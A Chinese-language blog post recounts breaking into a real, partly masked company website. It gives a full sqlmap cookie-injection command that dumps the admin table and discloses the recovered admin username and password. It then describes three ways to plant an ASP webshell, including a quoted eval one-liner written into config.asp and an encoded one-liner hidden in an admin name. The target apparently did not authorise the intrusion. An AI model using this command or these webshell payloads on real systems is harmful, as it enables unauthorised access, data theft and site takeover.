这个网站是微信漏洞挖掘公开课群里的一位群友发出来的,空闲时看了看,不是很难,但是我觉得有一定的参考价值,算是比较经典的一种吧!
*声明:只做技术分享,后续已去除shell的文件!请相关公司做好及时的修复!看到这篇文章的大佬,也别去折腾了,思路本文已经分享,自重
微信群友发来这样的消息:
[图片已删除]
从这样的消息看出来,已经知道 editor 编辑器,可以确定发问者已经进入网站的后台了,所以这样的网站应该比较好拿下。
得知这个问题后,就分享到团队内部,大家有空的就可以看看,练练手。
0x01 SQL注入:
当我们访问主站的时候,随便加上参数,发现存在防止SQL注入的程序存在,影响了我们的注入。
当我们浏览器选择移动终端的模拟情况下,访问会跳转到手机的一个域名 m.xxxx.com ,这样的网站就是一个手机域名的,但是是一个和PC公用一个后台的网站程序。
对于子站的防护一般不强,选择了手机网站程序入手,加上' 发现还是会被程序拦截,想到 asp 程序的接受参数用的 request 语句,可以接受 post、get、cookie的参数,因此,我们尝试 cookie注入
这里简单测试发现存在注入,可以写脚本的方式测试,但是为了简单,直接使用 Sqlmap 神器
再来这样一句:
python sqlmap/sqlmap.py -u "http://m.xxxx.com/ProductShow.asp" --cookie "id=325" --batch --dbs --level 2 -T admin -C "id,username,password" --first 1 --dump
得到管理员账号:admin
解密得到管理员密码:admin6830
0x02 进入后台:
后台地址:域名/manage/login.asp
进去后浏览器选择 兼容模式
0x03 获取Shell:
有三种方式,不详细展示:
1.编辑器其实是 kindeditor ,这个编辑器除了一个XSS漏洞就没什么了,这里选择上传一张带有小马的照片,然后在备份文件中,备份这个文件为 一个 a.asp 的格式备份文件,但会显示备份文件 xxxx/a.asp.asa 成功,其实并没有asa的文件后缀,所以直接连接你的小马就行了。
2.网站配置文件是写配置文件的形式,保存的文件为./Inc/config.asp,保存配置文件的小马推荐一个:
"%><%Y=request("x")%><%eval(Y)%><%'
3.在管理员管理处,添加管理员处,添加编码后的一句话:
┼攠數畣整爠煥敵瑳∨≡┩愾
密码:a
然后备份文件,只需要修改备份后的文件后缀为 asp,也会遇上 asp.asa 的回显,去掉 .asa 即可菜刀连接
0x04 总结:
经典的东西,分享之~